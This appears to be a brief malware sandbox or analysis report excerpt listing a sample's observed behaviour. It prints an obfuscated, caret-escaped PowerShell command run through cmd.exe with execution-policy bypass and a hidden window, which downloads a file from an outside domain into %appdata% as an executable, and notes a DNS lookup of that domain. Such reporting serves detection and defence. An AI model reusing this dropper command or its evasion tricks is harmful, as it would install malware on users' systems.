Technical Information
- http://sonnystafgy.top/search.php as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^ow^ERSh^ell.^e^Xe ^-EXE^Cut^io^Npo^lI^cy^ b^YP^A^S^s^ -n^oPROf^ILE -wiNDOwstylE ^hI^D^DEn (^NEW-O^b^ject^ sySTEm.NEt.WEbcL^i^ent).^dOwnlOa^df^Ile('http://sonnystafgy.top/...
- DNS ASK so###stafgy.top
- '<SYSTEM32>\cmd.exe' /C "p^ow^ERSh^ell.^e^Xe ^-EXE^Cut^io^Npo^lI^cy^ b^YP^A^S^s^ -n^oPROf^ILE -wiNDOwstylE ^hI^D^DEn (^NEW-O^b^ject^ sySTEm.NEt.WEbcL^i^ent).^dOwnlOa^df^Ile('http://sonnystafgy.top/...' (with hidden window)